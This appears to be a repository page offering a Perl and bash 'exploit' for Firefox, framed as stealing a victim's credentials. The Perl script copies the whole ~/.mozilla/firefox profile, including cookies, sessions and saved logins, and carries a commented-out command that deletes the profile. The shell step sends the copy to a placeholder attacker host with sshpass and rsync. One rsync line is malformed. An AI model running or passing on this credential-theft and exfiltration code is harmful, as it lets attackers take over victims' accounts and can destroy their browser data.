Permalink
Fetching contributors…
Cannot retrieve contributors at this time
36 lines (27 sloc) 996 Bytes
# Firefox58 developers bug
Ok. So, this is not normal, just someone to copy all storing files, sessions, cookies and save session credentials, from firefox hidden folder.
And then he put them on folder into his machine. And voala. He has credentials of the victim.
# Exploit mrazilla.pl
#!/usr/bin/perl
use strict;
use warnings;
# Create directory container;
sub main {
our $directory = "container";
unless(mkdir $directory) {
die "Unable to create $directory\n";
}
}
main();
# Stealing firefox information;
our $mrazilla_copy = `cp -avr ~/.mozilla/firefox container`;
# our $destroy_old_dir = `rm -rf ~/.mozilla/*`;
exit 0;
# Syncing on attacker machine
#!/usr/bin/bash
# stil
sshpass -p _your_attacker_password_ rsync -avzhe ssh container/firefox root@_your_attacker_IP:/root/
# Option:
# ssh-keygen -t RSA -b 5000
# ssh-copy-id to attacker machine, then...
rsync -a _your_attacker_password_ rsync -avzhe ssh container/firefox root@_your_attacker_IP:/root/